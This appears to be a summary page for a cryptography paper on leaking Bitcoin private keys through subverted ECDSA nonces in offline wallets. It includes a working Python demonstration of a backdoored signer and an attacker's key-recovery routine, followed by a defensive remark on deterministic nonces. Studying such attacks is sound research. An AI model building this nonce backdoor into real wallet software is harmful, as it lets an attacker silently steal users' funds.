How Perfect Offline Wallets Can Still Leak Bitcoin Private Keys
Stephan Verbücheln

TL;DR
This paper shows how the signer's freedom to choose the ECDSA nonce lets an attacker who controls that choice leak a Bitcoin private key through ordinary-looking signatures, with no side channel, so even a perfectly isolated offline wallet does not protect against it.
Contribution
It carries the attack that Young and Yung described in 1997 for classic DL-based cryptosystems over to ECDSA and shows how it applies to the Bitcoin protocol.
Findings
ECDSA's non-deterministic nonce choice can be used to leak the private key through the signature itself
The attack needs no side channel, so keeping a wallet offline does not prevent it
The attack carries over to ECDSA as used in the Bitcoin protocol
Abstract
ECDSA has become a popular choice as a lightweight alternative to RSA and classic DL-based signature algorithms in recent years. As standardized, the signature produced by ECDSA for a given message and key is not deterministic. This work shows how this non-deterministic choice can be exploited by an attacker to leak private information through the signature without any side channels, an attack first discovered by Young and Yung for classic DL-based cryptosystems in 1997, and how this attack affects the application of ECDSA in the Bitcoin protocol.
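The attack class the abstract describes, as an added worked example (not the paper's own code or construction): a pure-Python ECDSA over secp256k1 in which a subverted signer picks the nonce of its second signature from a secret shared with the attacker, namely a hash of the point k1·A, where k1 is the honest nonce of the first signature and A is the attacker's public key. The attacker, holding the matching private key a, reconstructs that point from the first signature's r1 alone as a·(k1·G), recomputes the second nonce, and solves the signature equation for the wallet's private key. This is the simplest form of the Young and Yung style nonce subversion; the exact nonce derivation, the attacker and wallet key values, and the two messages are assumptions constructed for this example. The curve constants are the standard secp256k1 parameters.

```python
"""Nonce subversion of ECDSA on secp256k1 (added example, not the paper's code).

A subverted signer chooses the nonce of its second signature as
H(x(k1 * A)), where k1 is the random nonce of its first signature and A is
the attacker's public key. The attacker sees only two ordinary signatures.
"""
import hashlib
import secrets

# secp256k1 domain parameters (standard constants)
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)


def ec_add(p1, p2):
    """Affine point addition; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, pt):
    """Double-and-add scalar multiplication (not constant time; demo only)."""
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc


def msg_hash(msg: bytes) -> int:
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N


def sign(d, msg, k):
    """Standard ECDSA with an explicit nonce k; returns (r, s)."""
    r = ec_mul(k, G)[0] % N
    s = pow(k, -1, N) * (msg_hash(msg) + r * d) % N
    assert r and s
    return r, s


def verify(Q, msg, sig):
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    w = pow(s, -1, N)
    X = ec_add(ec_mul(msg_hash(msg) * w % N, G), ec_mul(r * w % N, Q))
    return X is not None and X[0] % N == r


def lift_x(x):
    """A curve point with this x (y^2 = x^3 + 7), or None. P = 3 mod 4, so sqrt is a power."""
    rhs = (x ** 3 + 7) % P
    y = pow(rhs, (P + 1) // 4, P)
    return (x, y) if y * y % P == rhs else None


def subverted_nonce(shared_point):
    """Assumed derivation for this example: nonce = SHA-256 of the shared point's x-coordinate."""
    return int.from_bytes(hashlib.sha256(shared_point[0].to_bytes(32, "big")).digest(), "big") % N


def subverted_sign_pair(d, attacker_pub, msg1, msg2):
    """Sign two messages; the second nonce is derived from k1 * A."""
    k1 = secrets.randbelow(N - 1) + 1
    sig1 = sign(d, msg1, k1)
    k2 = subverted_nonce(ec_mul(k1, attacker_pub))
    return sig1, sign(d, msg2, k2)


def attacker_recover(attacker_priv, wallet_pub, msg2, sig1, sig2):
    """Recover d from the two public signatures using only the attacker's private key."""
    r1, _ = sig1
    r2, s2 = sig2
    # r1 is x(k1*G) mod N; x(k1*G) may exceed N with negligible probability, so try both lifts.
    for x in (r1, r1 + N):
        R1 = lift_x(x) if x < P else None
        if R1 is None:
            continue
        # a * (+-k1*G) = +-(k1 * A): same x-coordinate either way, so the sign of y is irrelevant.
        k2 = subverted_nonce(ec_mul(attacker_priv, R1))
        d = (s2 * k2 - msg_hash(msg2)) * pow(r2, -1, N) % N
        if ec_mul(d, G) == wallet_pub:
            return d
    return None


# Constructed keys and messages for the demonstration (not real wallet data).
ATTACKER_PRIV = 0xA11CE0000000000000000000000000000000000000000000000000000000BEEF
ATTACKER_PUB = ec_mul(ATTACKER_PRIV, G)
WALLET_PRIV = 0x0BAD5EED00000000000000000000000000000000000000000000000000C0FFEE
WALLET_PUB = ec_mul(WALLET_PRIV, G)
MSG1, MSG2 = b"spend tx 1", b"spend tx 2"


def demo():
    """Both signatures verify normally, yet the attacker recovers the wallet key."""
    sig1, sig2 = subverted_sign_pair(WALLET_PRIV, ATTACKER_PUB, MSG1, MSG2)
    ok = verify(WALLET_PUB, MSG1, sig1) and verify(WALLET_PUB, MSG2, sig2)
    recovered = attacker_recover(ATTACKER_PRIV, WALLET_PUB, MSG2, sig1, sig2)
    return ok, recovered == WALLET_PRIV
```

Both signatures pass ordinary ECDSA verification and are indistinguishable from honest ones to anyone without the attacker's private key, which is why an air gap does not help: the leak travels inside the signatures the wallet must publish anyway. Deterministic nonces (RFC 6979) remove the signer's freedom to choose k, but a user can only rely on that if the device's nonce derivation can be checked from outside, for example by recomputing the expected signature for a key the user also holds elsewhere.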
Taxonomy
Topics: Cryptography and Data Security · Cryptography and Residue Arithmetic · Chaos-based Image/Signal Encryption
